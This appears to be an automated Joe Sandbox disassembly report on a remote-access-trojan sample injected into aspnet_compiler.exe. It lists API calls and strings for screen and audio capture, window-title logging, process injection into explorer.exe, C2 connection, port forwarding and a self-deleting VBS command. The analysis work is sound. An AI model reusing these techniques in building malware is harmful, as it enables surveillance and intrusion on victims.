                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                          • _free.LIBCMT ref: 004500A6
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 004500C8
                                                          • _free.LIBCMT ref: 004500DD
                                                          • _free.LIBCMT ref: 004500E8
                                                          • _free.LIBCMT ref: 0045010A
                                                          • _free.LIBCMT ref: 0045011D
                                                          • _free.LIBCMT ref: 0045012B
                                                          • _free.LIBCMT ref: 00450136
                                                          • _free.LIBCMT ref: 0045016E
                                                          • _free.LIBCMT ref: 00450175
                                                          • _free.LIBCMT ref: 00450192
                                                          • _free.LIBCMT ref: 004501AA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                          • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                          • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                          • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                          Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041912D
                                                          • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                          • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                          • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                          • API String ID: 489098229-65789007
                                                          • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                          • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                          • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                          • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                          Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 004042A5
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                          • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                          • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                          • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                          • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                          Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                          • ExitProcess.KERNEL32 ref: 0040C832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                          • API String ID: 1913171305-390638927
                                                          • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                          • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                          • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                          • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                          Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                          • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                          • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                          • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                          Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                          • GetLastError.KERNEL32 ref: 00454A96
                                                          • __dosmaperr.LIBCMT ref: 00454A9D
                                                          • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                          • GetLastError.KERNEL32 ref: 00454AB3
                                                          • __dosmaperr.LIBCMT ref: 00454ABC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                          • CloseHandle.KERNEL32(?), ref: 00454C26
                                                          • GetLastError.KERNEL32 ref: 00454C58
                                                          • __dosmaperr.LIBCMT ref: 00454C5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                          • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                          • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                          • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                          Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040A456
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                          • GetForegroundWindow.USER32 ref: 0040A467
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                          • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                          • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                          • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                          • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                          Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                          • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                          • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                          • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                          Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                          • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                          • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                          • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                          Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                          • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                          • __dosmaperr.LIBCMT ref: 004393CD
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                          • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                          • __dosmaperr.LIBCMT ref: 0043940A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                          • __dosmaperr.LIBCMT ref: 0043945E
                                                          • _free.LIBCMT ref: 0043946A
                                                          • _free.LIBCMT ref: 00439471
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                          • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                          • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                          • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                          Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                          • TranslateMessage.USER32(?), ref: 00404F30
                                                          • DispatchMessageA.USER32(?), ref: 00404F3B
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                          • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                          • Opcode Fuzzy Hash: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                          • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                          Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                          • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                          • String ID: <$@$@FG$@FG$Temp
                                                          • API String ID: 1107811701-2245803885
                                                          • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                          • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                          • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                          • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                          Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                          • API String ID: 2050909247-4145329354
                                                          • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                          • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                          • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                          • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                          Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                          • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                          • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                          • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                          Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00446DDF
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00446DEB
                                                          • _free.LIBCMT ref: 00446DF6
                                                          • _free.LIBCMT ref: 00446E01
                                                          • _free.LIBCMT ref: 00446E0C
                                                          • _free.LIBCMT ref: 00446E17
                                                          • _free.LIBCMT ref: 00446E22
                                                          • _free.LIBCMT ref: 00446E2D
                                                          • _free.LIBCMT ref: 00446E38
                                                          • _free.LIBCMT ref: 00446E46
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                          • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                          • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                          • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                          Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                          • API String ID: 3578746661-4192532303
                                                          • Opcode ID: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
                                                          • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                          • Opcode Fuzzy Hash: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
                                                          • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                          Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                          • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                          • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                          • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                          Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • Sleep.KERNEL32(00000064), ref: 00416688
                                                          • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                          • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                          • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                          • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                          Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401AD3
                                                            • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
